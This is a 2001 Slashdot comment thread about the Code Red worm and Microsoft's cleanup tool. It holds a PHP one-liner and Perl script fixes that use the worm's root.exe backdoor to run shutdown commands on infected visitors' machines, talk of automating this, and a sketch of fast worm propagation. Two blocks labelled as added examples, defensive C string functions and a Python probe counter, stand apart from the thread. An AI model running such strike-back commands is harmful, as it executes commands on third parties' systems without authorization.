    This is like selling a shotgun that only fires when pointed at another weapon that is pointed at it, and cannot be modified to do anything else.

    However, many people will (as you have done) only see that ``it is a shotgun'' (and panic), not that it is totally harmless except as used against armed attackers! This is important because some drooling idiots will now conclude, ``it's OK to sell shotguns because SlashDot has done it already''.

    --
    Got time? Spend some of it coding or testing
  83. Blame Canada! by rasjani · · Score: 2, Funny

    I'm coordinating Programmers Against Canada. Anyone want to join? Everyone who joins gets an official P.A.C-MAN membership card =))

    --
    yush
  84. So I get to sue Linux? by sheldon · · Score: 2

    Now that's an interesting quandary. LLCs were set up to protect shareholders from liability claims against the company. So I as a developer for software at Acme Corp cannot be legally held liable, myself, for the software I created while working for the company.

    But Acme Corp can. Hell if it's bad enough, they'll get sued to high heaven and go bankrupt. Then I can just go find another job.

    But what corporation protects Linux? If there's a fault in the Linux kernel which causes something bad to happen... Who do I sue?

    Are Linus Torvalds and Alan Cox protected by a LLC? Or do I just sue them personally?

    Now you enter into the world of politics. How do you write a law which damages your adversaries, while protecting your friends?

    Then the question comes in. What exact purpose does this serve to our society? Will software get better, or will there just be less of it? Especially in light of the fact that you mentioned indirect uses of software, such as AT&T.

    It's very easy for people like Bruce Schneier to talk about this because they don't actually write and sell software.

    I'll be impressed when you get Larry Ellison or Scott McNealy up there saying it's a good idea. I'll be really impressed when you get Bill Gates.

  85. Re:Not the mess they made... by Nater · · Score: 2, Insightful

    Microsoft fixed the problem before there was a problem.

    I disagree. Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

    --

    I like to play children's songs in minor keys.
    "We're all sons of bitches now." --J. Robert Oppenheimer

  86. CI Host sucks rocks by The+Big+Bopper · · Score: 3, Informative

    My domain is on a shared Linux host at CI Host. For over one week now, starting August 2, my domain has been totally useless to me. I couldn't log in to update my content. I couldn't receive email on the domain POP3 box. I couldn't log in with a POP3 client to download any mail that did sneak through. All this went on for over a week. I would call up on the phone and stay on hold forever... a couple of times I would get clueless technicians that would just say "It's the Code Red virus... our administrators are aware of the problem and will have it fixed as soon as possible". OK I gave them some time to get it fixed because half the internet was having problems with this. But then I noticed everyone else was getting better, and CI Host was still down (except their own www.cihost.com site, which was still aggressively selling service to new customers). I would open up online trouble tickets with them, only to have them get closed without resolution. I re-opened and escalated a couple of times and finally early this morning they took my server down to perform some kind of unknown maintenance and when it came back up it was running better than it EVER had before in the 2+ years I've been with them.

    If anyone is thinking of using CI Host, let me tell you THEY SUCK. About twice a year something major like this happens where I'm down for a week or more. In December of 1999 I went down for almost a whole month (their press releases will tell you it was a much shorter time than this but that is BULLSHIT).

    I'm looking at maybe switching to PrimeMaster Online (http://www.primemaster.com). Anyone here have experience with them?

    1. Re:CI Host sucks rocks by Micah · · Score: 2

      Yikes, I just about used those guys. Then I found www.bchosting.com and have been fairly happy with them so far....

  87. Re:setting this up? by BorgDrone · · Score: 4, Informative

    in /etc/apache/httpd.conf:

    AddHandler cgi-script .ida

  88. You're a bl**dy spoilsport! by leonbrooks · · Score: 2
    Which system did Ramen infect?

    How come despite there being (at the time) three times as many Apache servers up as IIS, there wasn't a shadow of the traffic that CodeRed caused?

    Software has bugs. They get found, they get fixed, move on.

    Don't tell only half a story, and leave out the exciting bits that make it all flow. ``They get found'' seems to have taken, oh... six years, is it now? Why? (1)

    Not only that, breaking Apache (to pick a common example) doesn't automagically get you superuser capabilities. Why not? (2)

    It's been four years now since Apache had a hole this bad, but IIS had them somewhere between monthly and quarterly. Why? (3)

    1. Only Microsoft can see the source, and their programmers generally don't understand security. 2. IIS is design-insecure partly because it takes as many shortcuts as it can to avoid being molasses-slow. Did you know that the Mindcraft benchmarks used FAT instead of NTFS for the same reason? 3. Performance and user friendliness and saleable features are all more important to Microsoft than security or stability.

    --
    Got time? Spend some of it coding or testing
  89. But how many know that? by wirefarm · · Score: 3, Interesting

    You and I know that you don't need your proof of purchase, but is it inconceivable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - thinking that MS will somehow *know* and track them down?

    --
    -- My Weblog.
  90. Script Error by UVABlows · · Score: 2, Informative

    The author intended for it to shut down IIS first, then the remote machine, but he is actually issuing the IIS shutdown command twice. Examine:

        my $resp = $ua->request ($iis_stop_req);
        if ($resp->is_success) {
            my $server_stop_req = [...]
            $resp = $ua->request ($iis_stop_req);

    That second request should be $server_stop_req instead of $iis_stop_req.

    Now to fiddle with httpd.conf..... WOW SLASHCODE SUCKS, I couldn't submit this at first because it was considered a junk character post. That filter really sucks, I've triggered that so many times trying to do an actual post.

    --

    <high-level position here>
    <name of stupid small company here>

  91. Re:Next step: automate it! by Mike+Hicks · · Score: 2
    C:\>ftp -h
    [snip]
    -s:filename Specifies a text file containing FTP commands
    Looks like you just have to find an FTP server that has the program.
  92. Re:Blame people that ENCOURAGE this... by tcc · · Score: 2


    Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

    And I guess that Linux is better in that perspective? How many times do you see Linux people doing the EXACT SAME THING by saying it's more secure and stable than Windows? Wouldn't that bring the exact same reaction? "I'll install a Linux/Apache server because it's more secure" - but what if that person has the 0-patching thing in mind already? It's not FORGED by Microsoft alone, that's my point... both platforms do the exact same thing on that issue.

    I don't want to start a Linux vs Windows war because it's totally useless, and I surely don't want to be seen on the M$ side :), but my point is still valid, and the one who moderated that as a troll is probably another zealot who can't understand and saw his beloved platform scratched by my comments.

    In the end, any OS needs patching, and people need to be educated about it. Linux or Windows or Mac, I don't care; seeing my RD light on my modem still flashing like hell this long after that virus (and titles like "aftermath") got announced, THAT worries me a lot.

    --
    --- Metamoderating abusive downgraders since my 300th post.
  93. Re:Warhol Worm proposed: 15 minutes to total infec by SuiteSisterMary · · Score: 2

    And at that point, you program the worm to be self modifying. Target some 'known' servers. Infect them with targeted worms. On some condition (probably date) each worm (let's say N is the total number of preinfected systems) will start scanning a group of addresses. If V represents the total number of IPv6 addresses, each host will have a group of exclusive addresses, E, E being V/N number of addresses. Whenever a host finds a new victim, it will give that victim a range of addresses in E to go through, after which the 'subhosts' will attack at random. The host will then start scanning the next address past the block it just doled out.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  94. Re:Who to blame: MS or Admins? by Capt.+Beyond · · Score: 2, Interesting

    You're wrong. It's the virus writers' fault.

    --
    -- "Perceptions create reality. By changing your perceptions you change your reality."
  95. Liability for software defects by jeffy124 · · Score: 5, Interesting

    There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles. Some good examples where this would apply include some major items in software bugs history: the AT&T 800 service outage, the hospital radiation treatment software controllers that killed people from overexposing them to radiation, and of course Code Red. CNN interviewed Bruce Scheneir (sp?) about this issue and he is all for holding software makers liable. Last week I tried submitting those stories to slashdot, yet the editors don't think it's an issue and won't post it, despite the fact that if liability someday hits the software market, it hits OSS people too.

    --
    The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
    1. Re:Liability for software defects by tswinzig · · Score: 3, Insightful

      There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles.

      The major difference in this case, and the reason that any case against Microsoft would ultimately lose (at least for the Code Red attack), is that Microsoft released a patch well before Code Red came out.

      Ford and Firestone, on the other hand, tried to cover it up for as long as possible.

      --

      "And like that ... he's gone."
  96. Microsoft made this mess? Huh? by tswinzig · · Score: 3, Insightful

    Michael writes, So, Microsoft has given you a mop to clean up the mess they made.

    No, Microsoft gave us a mop to clean up after the mess the Code Red author(s) made.

    You see, more than a month before Code Red came out, Microsoft gave us the patch for the security breach that allowed Code Red to take place.

    --

    "And like that ... he's gone."
    1. Re:Microsoft made this mess? Huh? by JoeBuck · · Score: 2

      Microsoft did not make the mess by just having a security hole. Security holes happen. The reason Code Red exploded, and the reason it's taken so long for everyone to patch their systems, is because the lion's share of infections are to systems where the owner didn't even know that he or she is running IIS.

      Now, even this kind of mistake happens and is made by others, which is why an unpatched Red Hat 6.2 box will survive on the open Internet for less than 15 minutes before being rooted. But Microsoft made a critical error a month ago, when Code Red I broke, by not urging all users to check whether they intend to run IIS or not, and if not, to turn it off.

      Finally, Microsoft is to blame for releasing a security tool at this late stage that will not do the job. By now, the bad guys have used their lists of IP addresses of infected systems to install back doors on tens of thousands of systems. These back doors will survive Microsoft's mop. But telling the truth -- that the only safe thing is to reformat the system and start all over again -- will look really bad and cost the users a lot of time and money. So they mumble something about checking the CERT advisory to cover their asses legally, and then they do this irresponsible thing.

  97. Re:setting this up? by nick-less · · Score: 2, Informative
    actually one could also do something like
    <?php fopen("http://".getenv("REMOTE_ADDR")."/scripts/root.exe?/c+iisreset+/stop","r"); ?>
    and
    AddType application/x-httpd-php .ida

    In case you prefer php
  98. How to use Perl and Lotus Domino Server by scotpurl · · Score: 2

    Lotus Domino can use Perl. Off-topic, I know, but this is to help out folks.

    1. Make sure your server is not using IIS (since life is easier that way).
    2. Install Perl from perl.com. You don't need the ISAPI stuff. Make sure perl is in the path.
    3. Add a file association on the OS level for .ida files pointing to the perl interpreter. (Copy what you see for .pl files.)
    4. Create a URL -> URL mapping of /default.ida to /cgi-bin/default.ida
    5. Place the default.ida script in your Lotus\Domino\Data\domino\cgi-bin directory.
    6. Restart the Domino server.
    7. Test it with http://myserver/default.ida?one_arg

    Not all of us use Apache, so save the flames. Some of us have to stick with what the company we work for requires us to use.

  99. Start blaming Microsoft again by leonbrooks · · Score: 5, Interesting

    As has been so often pointed out, many of Microsoft's fixes also often break things, and they have a nasty habit of occasionally including "improvements" that eventually dead-end you and don't become obvious for some time - like well after it's too late to back out the patch. These features combine to make many admins that I know highly reluctant to install Microsoft's fixes.

    Apache is more of a monoculture (about twice as much) than IIS, yet Apache worms this bad generally don't happen because:

    * Apache is not design-insecure, as is practically every Microsoft product - for example, Exchange's security goolies are still flapping in the breeze (have to be due to fundamental design) and I expect to see another CodeRed appear targeted for it Real Soon Now;

    * If you want active facilities, you have to install them - or at least switch them on - because they either don't come with the base server (e.g. PHP) or aren't available in default pages to exploit (e.g. XSSI);

    * The active facilities can only touch as much as the webserver can touch. Users named ``apache'' or ``nobody'' generally don't have write access to a great deal of the file system;

    * Even though Apache as such is a monoculture, there is great variety between Apaches. They run on a wide variety of CPUs and OSes. Your binaries might be in /usr/bin, /usr/local/apache/bin, /opt/apache/bin or any one of a number of places; your web pages might be in /home/httpd/html, /var/www/html, /usr/local/apache/html or anywhere the admin chose to put them. It might be running chrooted, it might or might not have zero or more of a great number of modules enabled, and so on;

    * Apache adheres to standards; a lot of IIS holes have been in Microsoft special features;

    * Apache's code (including most common add-ons) has been examined by a wide variety of eyes using a wide variety of techniques.

    Using Microsoft software costs you all of these advantages and more.

    --
    Got time? Spend some of it coding or testing
  100. Who to blame: MS or Admins? by slasho81 · · Score: 2, Interesting

    People here suggest that admins are to blame for the Code Red ongoing catastrophe because they took the responsibility to maintain a server.

    Some posts accuse of letting MCSE handle servers, which only mighty hackers with years of experience should touch.

    I think it's stupid. There aren't enough admins that fit the definition of experienced hackers. That's why organizations buy server software to handle 'serving'. They hire admins to operate the server, not to code-and-compile or patch every morning. It's true that admins are the ones responsible to patch software, but you can't expect all servers to be patched the moment a patch is released; hell, MS servers failed to patch on time.

    The software is not secured. Whose negligence is it?

  101. Re:Blame everyone bigger than you.! by SuiteSisterMary · · Score: 2

    Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server. You could configure apache to use index server, I'm sure, and then code red would *gasp* AFFECT APACHE! By your logic, at least.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  102. Re:Actually: authors of strncat() MAN PAGE and get by csbruce · · Score: 2

    Make your own functions. I use:

    void StrCpy( char *dest, const char *source, long destSize );

    void StrCat( char *dest, const char *source, long destSize );

    etc. E.g.:

    char str[STD_LINE_SIZE];
    StrCpy( str, blah, STD_LINE_SIZE );
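    An added example, not csbruce's own code: a working version of the bounded StrCpy/StrCat with the signatures quoted above, plus a truncation check, with STD_LINE_SIZE set to 16 here so the cut-off is visible. It also illustrates the earlier point in the thread about the unchecked copy loop: the bound is taken from the destination size, never from the input.

```c
#include <stdio.h>
#include <string.h>

#define STD_LINE_SIZE 16   /* deliberately small so truncation is easy to see */

/* Copy at most destSize-1 characters of source into dest and always
 * NUL-terminate.  A destSize of 0 or less means there is no room at all,
 * so nothing is written.  Unlike an unchecked copy loop, the bound comes
 * from the destination buffer, not from the attacker-controlled source. */
void StrCpy(char *dest, const char *source, long destSize)
{
    long i;

    if (destSize <= 0)
        return;
    for (i = 0; i < destSize - 1 && source[i] != '\0'; i++)
        dest[i] = source[i];
    dest[i] = '\0';
}

/* Append source to the NUL-terminated string already in dest without
 * ever writing beyond dest[destSize-1].  If no terminator is found within
 * destSize bytes the buffer is treated as full and left untouched. */
void StrCat(char *dest, const char *source, long destSize)
{
    long used = 0;

    if (destSize <= 0)
        return;
    while (used < destSize && dest[used] != '\0')
        used++;
    if (used == destSize)          /* unterminated or already full */
        return;
    StrCpy(dest + used, source, destSize - used);
}

/* Callers that must not silently lose data can check first:
 * returns 1 if source (plus its terminator) does not fit in destSize. */
int WouldTruncate(const char *source, long destSize)
{
    return destSize <= 0 || strlen(source) >= (size_t)destSize;
}

/* Copy a constructed 40-character input into a buffer limited to destSize
 * bytes (destSize <= 64) and report the resulting length.  Returns -1 when
 * nothing was written and -2 if a sentinel byte past the bound was touched. */
long CopyTruncatedLength(long destSize)
{
    char input[41];
    char out[64];

    memset(input, 'x', 40);        /* constructed oversized input */
    input[40] = '\0';
    memset(out, '#', sizeof out);  /* sentinel bytes around the target area */
    StrCpy(out, input, destSize);
    if (destSize <= 0)
        return -1;
    if (destSize < 64 && out[destSize] != '#')
        return -2;
    return (long)strlen(out);
}

/* Build "abcd" then append a 16-character string into a 16-byte line
 * buffer; returns 1 when the result is the expected truncated string. */
int CatDemo(void)
{
    char line[STD_LINE_SIZE];

    StrCpy(line, "ab", STD_LINE_SIZE);
    StrCat(line, "cd", STD_LINE_SIZE);
    StrCat(line, "0123456789abcdef", STD_LINE_SIZE);
    return strcmp(line, "abcd0123456789a") == 0;
}

/* A dest with no terminator inside destSize must be left alone. */
int CatRefusesUnterminated(void)
{
    char full[4] = { 'a', 'b', 'c', 'd' };

    StrCat(full, "x", 4);
    return memcmp(full, "abcd", 4) == 0;
}

int main(void)
{
    char line[STD_LINE_SIZE];

    StrCpy(line, "0123456789abcdefXYZ", STD_LINE_SIZE);
    printf("truncated copy: \"%s\" (%ld chars)\n", line, (long)strlen(line));
    printf("would 'hello' truncate in %d bytes? %d\n",
           STD_LINE_SIZE, WouldTruncate("hello", STD_LINE_SIZE));
    printf("cat demo ok: %d, unterminated dest refused: %d\n",
           CatDemo(), CatRefusesUnterminated());
    return 0;
}
```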

  103. Re:FUD ALERT by sqlrob · · Score: 2, Informative
    Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass.

    Ask and ye shall receive:

    NT SP 5 or 6 (sorry, don't remember which) broke the TCP/IP sequencing algorithm, making it vulnerable to spoofing.

    The fix for security holes in Exchange Web broke the server (twice - took 'em till the third try)

    My job is programming Windows boxes, so no, I'm not a paid basher.

  104. Remind me again... by reemul · · Score: 3, Informative

    Which system did Ramen infect? I'm pretty sure it wasn't a Microsoft platform.

    Software has bugs. They get found, they get fixed, move on. The only reason MS exploits get more press and greater impact than Linux exploits is that MS is on more boxes. If, as you claim to desire, Linux takes off, the same people shrieking to the sky about what a crappy system MS has will be defending Linux and saying, hey, it happens. Stupid users who don't patch aren't Bill Gates' fault.

    It's just the same crap from folks who attack NT as buggy and crash-prone (which is almost always due to 3rd-party drivers) while extolling the stability of Linux, which they keep rebooting because they have wonky drivers. A ha! they say, I was using a beta driver, it's to be expected. Well, that driver has been in beta for over a year, that's as good as it gets. Software has bugs, move on.

    You want to ignore your own faults and start a religious war? I'm betting you can get some cheap flights to Tel Aviv right now. Knock yourself out.

    -reemul
    who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working

    --
    You're just jealous 'cuz the voices talk to *me*
  105. Next step: automate it! by Quixote · · Score: 3, Redundant

    OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?
    For extra credit: reboot twice, as Micro$oft recommends.
    For a straight A: fix the problem forever by replacing NT with Linux...

    1. Re:Next step: automate it! by thing12 · · Score: 2

      That's almost what the link at the end of the story does. It does everything but patch the infected host. It would be funny as hell to just disable IIS on every infected box that connects to yours.

    2. Re:Next step: automate it! by IronChef · · Score: 2


      It would be nice to alter the last one to point to a page that says, "Hey Chester, you've been compromised, and your computer has been attacking mine lately. Install this patch or turn off the web server, you chucklehead."

  106. Re:FUD ALERT by analog_line · · Score: 4, Funny
    You can't because you are a paid basher talking out of your ass.

    Oh gods, someone PLEASE tell me how I could get a job bashing Microsoft. I do it for free all the time.

    And here's a security hole for you. Service Pack 6 (that's the original Service Pack 6, not 6a) not allowing anyone but Administrators to access the TCP/IP stack. You think that possibly some of Microsoft's vaunted legions of crack QA people might've possibly tried testing the service pack as something other than an Administrator?

  107. If you're concerned become a vigilante by gad_zuki! · · Score: 2

    There's a nice fake webserver you can run on unix or windows platforms that launches a warning html page on the attacker's machine. Why let the "authorities" run the net, especially when the code red attackers are asking you for default.ida - whatever you make that to be.

    Link:

    http://www.dynwebdev.com/codered/

  108. Re:Not the mess they made... by sheldon · · Score: 4, Insightful

    Just a correction... Apache does *NOT* run MUCH more of the web than does IIS.

    You just have to go look at the Netcraft surveys to understand. In the past they've pointed out that half of SSL enabled sites run IIS. Then about a month or two ago they started trying to identify individual machines and found the IIS/Windows combination again on half of the overall web.

    What we do know is that Apache is used in many more cohosting situations. Jimmy and Susy set up a web page and pay $0-10/month for it. Is it a significant thing that companies providing low price service with no service level agreements use a free OS/web server? I don't think so, but you be the judge.

    Two other points:

    Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

    You should *ALWAYS* test patches and new releases before installing them into a production environment. That applies not only to Microsoft, but also to Linux, Sun, HP, Oracle, Peoplesoft, everything!

    In our testing service packs don't usually break apps. But they do have a tendency to break drivers or low-level hardware monitoring tools provided by the manufacturer. Is this surprising? No. Again we have the same problems on our Unix servers with OS patches.

  109. Re:Not the mess they made... by Fishstick · · Score: 2, Informative

    It is worse than that, actually.

    Here, all of the W2K workstation boxes were infected. These are not sysadmins or developers who should know better, these are just all the people who work here and are provided with a workstation to do their jobs and have no idea that IIS is running on their machines.

    They have no idea and weren't ever told that they need to apply any patches. Couple days after the CR panic started to spread, we got an alert from our crack security administration group that we should download and install a patch from Microsoft if we were running any NT servers.

    Of course, none of them knew what the hell this meant, so they assumed it didn't apply to them and so did nothing.

    Sheesh, what a mess!

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  110. Re:Not the mess they made... by knorthern+knight · · Score: 2, Insightful

    > I mean at some point not everyone in the
    > world can be a computer expert,

    A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747s be made so easy to fly that every office worker could do it?

    > so are you recommending that people that
    > aren't shouldn't have a computer?

    If they are not willing/able to bring themselves up to the necessary level of competence to run general-purpose computers, yes. Give me a manually operated medium-format or 35 mm SLR camera, and I'm just as helpless as a Mac or Windows user at a unix commandline. If it ain't point-and-click, I'm totally lost. That doesn't mean I'm stupid; just that I'm not competent to use a particular tool.

    > There wouldn't be a computer industry if it
    > weren't for the "stupid" people needing
    > computers to help out their jobs and lives.
    > What we need to do is constructively help make
    > the experience good and safe for everyone.

    That's what WEB-TV is aiming at. They are to the general-purpose computer what the point-n-click camera is to professional equipment. The great majority of people aren't geeks. That's not disparagement; merely admitting that Joe Average is no more competent to operate a general purpose computer than I am to manually operate a medium-format camera. It's not an admission of stupidity, just an acknowledgement that different people have different competencies.

    --

    I'm not repeating myself
    I'm an X window user; I'm an ex-Windows user

  111. Re:Not the mess they made... by jeffy124 · · Score: 3, Interesting

    On top of that, there are the admins who missed repeated pleas from both Microsoft and Government officials urging them to install the patch, not to mention all the publicity the pleas and the virus got on CNN (both the website and on TV), other major national news networks, and even my local (Washington DC area) television news stations.

    --
    The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.

  112. Re:Microsoft PR by BorgDrone · · Score: 5, Interesting

    Actually, it might even be good PR for them too.

    This is what Joe User will think:
    A dangerous "virus" threatens the entire internet (*cough*) and then Microsoft comes to the rescue with a patch and saves the internet!

  113. Wow, what a tool by absurd_spork · · Score: 2, Insightful

    What a great tool that removes a couple of predefined files and reboots a system, nothing an admin couldn't have done himself in three minutes.

    I hope it's Microsoft-certified to work, at least.

    And disabling your web server as an option to keep your web server free from infection is so ingenious that I completely lack the words to describe the ingenuity behind it.

  114. Anybody who thinks... by talks_to_birds · · Score: 4, Insightful

    ...this is at the "mopping-up" stage is nuts.

    08/10/01 I received a total of 132 probes to tcp:80 on my 12.82.x.x dynamic IP via my dialup to worldnet.att.net

    These are exclusively from other dialups and small-scale hosts in AT&T's 12.x.x.x class A; AT&T has introduced ingress filtering and I'm seeing almost nothing from outside (Note: almost - some stuff is still leaking through.)

    But the problem is the enemy within: there's got to be thousands of home/SOHO small systems, maybe single boxes, put together by the hotshot early-adopters and techno-yuppies who think it's cool to go through the checkout stand at CompUSA and purchase a copy of Win 2K Professional, or whatever, and put it on their home systems with all the bells and whistles installed.

    None of these boxes are under *any* formal administrative control, and it's going to be up to each and every one of these thousands of techno-yuppies to patch each and every single one of their boxes.

    So far today 08/11/01 at 10:00am I've had 69 probes.

    As far as I can see, getting all these systems disinfected and patched hasn't even started yet.

    t_t_b

    --
    I'm on PJ's "enemies" list! Are you?

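    As an added defender-side example (not the poster's or the original page's code), here is a small Python script that does the kind of probe counting talks_to_birds describes, run over constructed Apache log lines: it tallies default.ida requests per day and per source address, tells the N-padded original worm from the X-padded Code Red II, and totals how many came from a given address block such as an ISP's /8. The log lines, addresses and the `%u9090` request tail are constructed samples, not captured traffic.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample Apache access-log lines (common log format); the
# addresses, timestamps and request tails are made up for illustration.
SAMPLE_LOG = """\
12.82.4.17 - - [10/Aug/2001:09:14:02 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 285
12.82.4.17 - - [10/Aug/2001:09:14:05 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 285
192.0.2.44 - - [10/Aug/2001:11:02:41 -0400] "GET /index.html HTTP/1.0" 200 1043
12.82.9.200 - - [10/Aug/2001:23:59:58 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 285
12.82.9.200 - - [11/Aug/2001:00:00:13 -0400] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 285
"""
# Fields of a common-log-format line that the counting needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/\w{3}/\d{4}):[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify(path):
    """Label a request path: the original worm pads its .ida query with
    N's, Code Red II with X's; any other default.ida hit is a variant."""
    if not path.lower().startswith('/default.ida?'):
        return None
    query = path.split('?', 1)[1]
    if query.startswith('NNNN'):
        return 'CodeRed'
    if query.startswith('XXXX'):
        return 'CodeRedII'
    return 'CodeRed-variant'


def count_probes(log_text):
    """Return (per_day, per_source, per_variant) Counters of .ida probes."""
    per_day, per_source, per_variant = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not common log format; skip rather than guess
        kind = classify(m.group('path'))
        if kind is None:
            continue  # ordinary request, not a worm probe
        per_day[m.group('day')] += 1
        per_source[m.group('ip')] += 1
        per_variant[kind] += 1
    return per_day, per_source, per_variant


def probes_from(per_source, cidr):
    """How many probes came from one address block, e.g. your own ISP's /8."""
    net = ipaddress.ip_network(cidr)
    return sum(n for ip, n in per_source.items() if ipaddress.ip_address(ip) in net)
```

    Pointing `count_probes` at a real access log (read the file instead of `SAMPLE_LOG`) gives the per-day and per-source tallies the comment above reports by hand, and `probes_from` shows what share of them originate inside your own provider's block.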
  115. Zodiac by Amphigory · · Score: 2

    (SPOILER WARNING)

    Anybody ever read Zodiac, by the always-popular Neal Stephenson? Short plot: the bad guys are dumping PCBs in Boston Harbor. They invent a genetically engineered bacterium to eat all the PCBs. They also invent one to make PCBs along the way, which accidentally gets loose and threatens to destroy the planet.

    I wonder how long it's going to be before some good-hearted, but slightly insane, person writes a Virus to close security holes in Windows? Then what happens when it trashes every version other than Windows 95 OEMSR3.1 (or whatever -- I don't run windows.) Would Microsoft do such a thing to cover up their mistakes? Would we ever know if they did?

    Incidentally, in my more evil moments, I had thought that a virus to change everyone's default web browser to Netscape would be kind of poetic justice. Let me say, up front, that I would not write one and am not advocating that anyone else does so. But it would be an interesting use of the SirCam code.

    --
    -- Slashdot sucks.

  116. Re:Warhol Worm proposed: 15 minutes to total infec by Phork · · Score: 4, Insightful

    Well, not really. The IPv6 address space will be largely unused, but the areas that are used will be well known; it would be very easy to specify the good ranges to scan.

    --
    -- free as in swatantryam - not soujanyam.

  117. The real reason to blame Microsoft by daviddennis · · Score: 2

    Microsoft marketing says:

    "You're a trained monkey. You too can run a web server! Just blow $1,000 on our systems and you're all set."

    The person who believed Microsoft when they said that is partially to blame, surely, but in the beginning it's Microsoft that has to take the hit for overpromising and underdelivering. If you promise a secure product anyone can use, well, you're on the hook if you don't supply one.

    D

  118. Blame people that ENCOURAGE this... by Svartalf · · Score: 2

    Microsoft's whole philosophy and marketing is that "it's easy to do" and that "anybody can do it".

    Applying patches isn't always easy - sometimes you've got to do it often.

    System security isn't easy - ever.

    Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

    I blame them not because they're big - I blame them because they fostered this BS in the first place!

    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas

  119. Re:Not the mess they made... by SilentChris · · Score: 2

    Actually, it was the mess the hackers created.

  120. Re:Why not simply uninstall IIS? by hearingaid · · Score: 2

    The permanent-disable function presumably would override future installs.

    Some M$ things install other M$ things automatically. I'm hoping that the permanent disable function would detect other programs trying to install IIS and stop them.

    I'm probably too optimistic...

    --

    my old sig used to be funny, but then slashcode ate it and now it's not funny anymore

  121. Not the mess they made... by shagoth · · Score: 3, Insightful

    It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins.

    1. Re:Not the mess they made... by Frater+219 · · Score: 3, Insightful
      > Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

      When my favorite open-source project discovers a security hole, it releases the patch in such a way that you can install it with a single command. Microsoft has an equivalent to this -- it's the "Critical Updates" section of the "Windows Update" facility. They frequently put important security and bug-fix patches in this section, so that Windows users can easily access them. This also makes it easy for site IT staff to encourage users to keep their systems up to date.

      The default.ida patch, a fix for a root-level compromise, was not placed in Critical Updates. Without either searching the site or being told of the correct URL to download the patch, users could not find it. People who used Windows Update religiously in the expectation of keeping their systems up to date were screwed. Sites which instructed their users that setting Windows Update to perform automatic updates would help keep them secure were screwed.

      Once again, Microsoft created an expectation and failed to live up to it.